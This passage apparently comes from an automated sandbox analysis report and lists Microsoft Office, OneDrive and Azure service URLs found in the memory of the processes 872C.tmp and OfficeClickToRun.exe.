    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://notification.m365.svc.cloud.microsoft/PushNotifications.Registeringg
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab/authzl
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocos-office365-s2s.msedge.net/abrride4V
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocws.officeapps.live.com/ocs/docs/recent-AD4A-41F5A7235243
    Source: 872C.tmp, 00000003.00000003.1393216623.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392280337.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430994473.0000000003CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocws.officeapps.live.com/ocs/docs/v2.0/sharedwithmefigSource
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocws.officeapps.live.com/ocs/quickaccess/sitesandteams
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocws.officeapps.live.com/ocs/v2/recent
    Source: 872C.tmp, 00000003.00000003.1393216623.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392280337.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430994473.0000000003CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/help/clientdeveloper
    Source: 872C.tmp, 00000003.00000003.1393216623.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392280337.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430994473.0000000003CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/servicemanager/catalog5
    Source: 872C.tmp, 00000003.00000003.1393216623.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392280337.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430994473.0000000003CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/servicemanager/liveredir?
    Source: 872C.tmp, 00000003.00000003.1393216623.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392280337.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430994473.0000000003CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/servicemanager/liveredirgSource
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/servicemanager/manageserviceredir.aspx
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/servicemanager/reportserviceerror
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/servicemanager/serviceaddr
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/servicemanager/v
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015814653.00000248C31A5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2051883076.00000248C31B2000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: 872C.tmp, 00000003.00000003.1430039742.0000000003F71000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394736534.0000000003F77000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394452880.0000000003F70000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394302183.0000000003F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/sm/onedrive_48_2.pngad
    Source: 872C.tmp, 00000003.00000003.1430039742.0000000003F71000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394736534.0000000003F77000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394452880.0000000003F70000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394302183.0000000003F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/sm/onedrive_48_2.pngfop
    Source: 872C.tmp, 00000003.00000003.1393216623.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392280337.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430994473.0000000003CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/federationProvider
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392526638.0000000005636000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393537508.0000000005635000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005636000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430628419.0000000005637000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392526638.0000000005636000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393537508.0000000005635000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005636000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430628419.0000000005637000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/idp
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015814653.00000248C31A5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2051883076.00000248C31B2000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsellI
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsellSkyDriveSignUpUpsellImagehttps:
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388436799.0000000003D1A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015854306.00000248C318B000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsellY
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpselllickr
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net-
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015929363.00000248C3202000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015530791.00000248C31EA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055051473.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040649536.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net6
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015929363.00000248C3202000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015530791.00000248C31EA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055051473.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040649536.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/237
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015929363.00000248C3202000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015530791.00000248C31EA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015814653.00000248C31A5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2057344669.00000248C0D3D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2060999948.00000248C3221000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2041372305.00000248C3212000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015894412.00000248C31DA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040649536.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com03329
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com1
